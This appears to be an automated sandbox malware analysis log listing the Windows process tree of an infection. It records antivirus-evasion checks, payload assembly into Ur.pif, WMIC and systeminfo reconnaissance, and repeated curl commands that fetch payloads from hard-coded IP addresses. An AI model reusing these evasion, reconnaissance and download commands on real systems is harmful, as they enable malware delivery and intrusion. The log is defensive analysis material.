                                        Start time:13:58:39
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xc70000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "wrsa opssvc"
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0x7ff7699e0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:13:58:41
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c md 139918
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /V "SyntaxMilesImperialTriple" Credits
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:13:58:42
                                        Start date:21/11/2024
                                        Path:C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        Wow64 process (32bit):true
                                        Commandline:Ur.pif v
                                        Imagebase:0x610000
                                        File size:893'608 bytes
                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 5%, ReversingLabs
                                        Has exited:false

                                        General

                                        Target ID:11
                                        Start time:13:58:43
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\choice.exe
                                        Wow64 process (32bit):true
                                        Commandline:choice /d y /t 5
                                        Imagebase:0x420000
                                        File size:28'160 bytes
                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:13:59:35
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:13:59:35
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:13:59:35
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                        Wow64 process (32bit):true
                                        Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
                                        Imagebase:0x290000
                                        File size:427'008 bytes
                                        MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:13:59:37
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:13:59:38
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:24
                                        Start time:14:00:05
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:25
                                        Start time:14:00:05
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:26
                                        Start time:14:00:05
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:14:00:07
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:14:00:07
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:14:00:07
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:14:00:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:14:00:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:32
                                        Start time:14:00:09
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:33
                                        Start time:14:00:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:34
                                        Start time:14:00:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:35
                                        Start time:14:00:10
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:36
                                        Start time:14:00:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:37
                                        Start time:14:00:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:38
                                        Start time:14:00:12
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:39
                                        Start time:14:00:15
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:40
                                        Start time:14:00:15
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:41
                                        Start time:14:00:15
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:42
                                        Start time:14:00:16
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:43
                                        Start time:14:00:17
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:44
                                        Start time:14:00:17
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:45
                                        Start time:14:00:18
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:46
                                        Start time:14:00:18
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:47
                                        Start time:14:00:19
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:48
                                        Start time:14:00:24
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:49
                                        Start time:14:00:24
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:50
                                        Start time:14:00:24
                                        Start date:21/11/2024
                                        Path:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                        Wow64 process (32bit):true
                                        Commandline:azvw.exe -o xhwq.zip
                                        Imagebase:0x400000
                                        File size:167'936 bytes
                                        MD5 hash:75375C22C72F1BEB76BEA39C22A1ED68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        Has exited:true

                                        General

                                        Target ID:51
                                        Start time:14:00:25
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:52
                                        Start time:14:00:25
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:53
                                        Start time:14:00:25
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:54
                                        Start time:14:00:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:55
                                        Start time:14:00:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:56
                                        Start time:14:00:26
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\curl.exe
                                        Wow64 process (32bit):true
                                        Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
                                        Imagebase:0xee0000
                                        File size:470'528 bytes
                                        MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:57
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:58
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:59
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\systeminfo.exe
                                        Wow64 process (32bit):true
                                        Commandline:systeminfo
                                        Imagebase:0xdd0000
                                        File size:76'800 bytes
                                        MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:60
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /C:"OS Name"
                                        Imagebase:0x4f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:61
                                        Start time:14:00:28
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0xda0000
                                        File size:418'304 bytes
                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:62
                                        Start time:14:00:31
                                        Start date:21/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:63
